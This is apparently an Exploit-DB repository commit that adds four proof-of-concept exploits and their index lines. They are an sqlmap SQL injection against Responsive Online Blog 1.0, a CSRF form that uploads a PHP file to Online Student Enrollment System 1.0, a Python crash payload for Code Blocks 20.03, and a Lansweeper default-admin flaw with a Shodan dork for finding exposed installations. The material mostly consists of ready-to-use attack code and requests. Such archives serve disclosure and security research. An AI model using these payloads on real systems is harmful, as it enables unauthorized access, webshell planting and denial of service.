DB: 2020-06-24

4 changes to exploits/shellcodes Code Blocks 20.03 - Denial Of Service (PoC) Lansweeper 7.2 - Incorrect Access Control Responsive Online Blog 1.0 - 'id' SQL Injection Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
2020-06-24 05:01:53 +00:00 · 2020-06-24 05:01:53 +00:00 · b8629afe42
commit b8629afe42
parent 09b5d3c1b6
5 changed files with 202 additions and 0 deletions
--- a/exploits/php/webapps/48615.txt
+++ b/exploits/php/webapps/48615.txt
@ -0,0 +1,21 @@
 # Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
 # Date: 2020-06-23
 # Exploit Author: Eren Şimşek
 # Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
 # Version: v1.0
 # Tested on: Linux - Wamp Server
 >Vulnerable File
   /category.php
 >Vulnerable Code
   $id=$_REQUEST['id'];
   $query="SELECT * from blog_categories where id='".$id."'";
   Id parameter enters sql query without any changes
 >Proof Of Concept
   sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch
   OR
   http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error
--- a/exploits/php/webapps/48616.txt
+++ b/exploits/php/webapps/48616.txt
@ -0,0 +1,89 @@
 # Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
 # Google Dork: N/A
 # Date: 2020-06-20
 # Exploit Author: BKpatron
 # Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
 # Version: v1.0
 # Tested on: Win 10
 # CVE: N/A
 # my website: bkpatron.com
 # Vulnerability:
 This product is unprotected against CSRF vulnerabilities.
 The application interface allows users to perform certain actions
 via HTTP requests without performing any validity checks to verify the
 requests.
 you can upload a PHP file here with CSRF.
 # CSRF PoC( add student ,File Upload):
 <html>
 <body>
 <form enctype="multipart/form-data" method="POST" action="http://localhost/student_enrollment/admin/index.php?page=add-student">
 		    <label for="name">Student Name</label>
 		    <input name="name" type="text" id="name" value="" required=""><br/>
 		    <label for="roll">Student Roll</label>
 		    <input name="roll" type="text" value="" pattern="[0-9]{6}" id="roll" required=""><br/>
 		    <label for="address">Student Address</label>
 		    <input name="address" type="text" value="" id="address" required=""><br/>
 		    <label for="pcontact">Parant Contact NO</label>
 		    <input name="pcontact" type="text" id="pcontact" pattern="01[5|6|7|8|9][0-9]{8}" value="" placeholder="01........." required=""><br/>
 		    <label for="class">Student Class</label>
 		    <select name="class" class="form-control" id="class" required=""><br/>
 		    	<option>Select</option>
 		    	<option value="1st">1st</option>
 		    	<option value="2nd">2nd</option>
 		    	<option value="3rd">3rd</option>
 		    	<option value="4th">4th</option>
 		    	<option value="5th">5th</option>
 		    </select><br/>
 		    <label for="photo">Student Photo</label>
 		    <input name="photo" type="file" id="photo" required=""><br/>
 		    <input name="addstudent" value="Add Student" type="submit" class="btn btn-danger">
 	 </form>
  </body>
 </html>
 #HTTP Request:
 http://localhost/student_enrollment/admin/index.php?page=add-student
 POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: multipart/form-data; boundary=---------------------------1586330740172
 Content-Length: 1669
 Referer: http://localhost/exploit2.php
 Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 -----------------------------1586330740172: undefined
 Content-Disposition: form-data; name="name"
 bkpatron
 -----------------------------1586330740172
 Content-Disposition: form-data; name="roll"
 333000
 -----------------------------1586330740172
 Content-Disposition: form-data; name="address"
 0000
 -----------------------------1586330740172
 Content-Disposition: form-data; name="pcontact"
 01911111111
 -----------------------------1586330740172
 Content-Disposition: form-data; name="class"
 1st
 -----------------------------1586330740172
 Content-Disposition: form-data; name="photo"; filename="up.php"
 Content-Type: application/octet-stream
 ...
 // uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php
--- a/exploits/windows/dos/48617.py
+++ b/exploits/windows/dos/48617.py
@ -0,0 +1,34 @@
 # Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC) 
 # Vendor Homepage: http://www.codeblocks.org/ 
 # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
 # Exploit Author: Paras Bhatia
 # Discovery Date: 2020-06-23
 # Vulnerable Software: Code Blocks
 # Version: 20.03
 # Vulnerability Type: Denial of Service (DoS)
 # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
 #Steps to Produce the Crash:
 #   1.- Run python code: CodeBlocksCrash.py
 #   2.- Copy content to clipboard
 #   3.- Open "codeblocks.exe"
 #   4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
 #   5.- Select "Active project's symbols" from drop down "View:" menu.
 #   6.- Paste ClipBoard into the "Search:" field.
 #   7.- Press Enter from keyboard.
 #   8.- Crashed.
 ##################################################################################################################################################
 #Python "CodeBlocksCrash.py" Code:
 f= open("CodeBlocksCrash.txt", "w")
 payload="\x41" * 5000
 f.write(payload)
 f.close()
--- a/exploits/windows/local/48618.txt
+++ b/exploits/windows/local/48618.txt
@ -0,0 +1,54 @@
 # Exploit Title: Lansweeper 7.2 - Incorrect Access Control
 # SHODAN DORK : title:"Lansweeper - Login"
 # Date: 2020-06-14
 # Exploit Author: Amel BOUZIANE-LEBLOND
 # Vendor Homepage: https://www.lansweeper.com/
 # Software Link: https://www.lansweeper.com
 # Version: 6.0.x through 7.2.x
 # Tested on: Windows
 # CVE : CVE-2020-14011
 ### Title:
 Incorrect Access Control.
 ### Category:
 Exploit
 ### Severity:
 Critical
 ### Description:
 Lansweeper 6.0.x through 7.2.x has a default installation in which the 
 admin password is configured for the admin account, unless "Built-in 
 admin" is manually unchecked. This allows command execution via the 
 Add New Package and Scheduled Deployments features.
 ### Other observation:
 Hi, This issue is kind of critical,
 By using shodan with this filter title:"Lansweeper - Login"
 We will find some Lansweeper with default installation on it
 ### Details:
 The Lansweeper application is agentless network inventory software that can be used for IT asset management.
 It uses the ASP.NET technology on its web application.
 ### Analysis:
 When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time,
 you are presented with a First Run Wizard, 
 which allows you to set up scanning and configure some basic options.
 Any subsequent times you access the console, 
 you are presented with a login screen.
 By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button.
 ### Suggested mitigation:
 restrict access to the console and configure what users can see or do once they've been granted access.
 You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts. 
 A user's role determines what the user can see or do within the console..
 ### Impact/Risk:
 Remote code execution
 can expose the organization to unauthorized access of data and programs, fraud.
 -- 
 Amel BOUZIANE-LEBLOND
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6751,6 +6751,7 @@ id,file,description,date,author,type,platform,port
 38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
 43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
 48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11112,6 +11113,7 @@ id,file,description,date,author,type,platform,port
 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
 48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows,
 48618,exploits/windows/local/48618.txt,"Lansweeper 7.2 - Incorrect Access Control",2020-06-23,"Amel BOUZIANE-LEBLOND",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42871,3 +42873,5 @@ id,file,description,date,author,type,platform,port
 48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,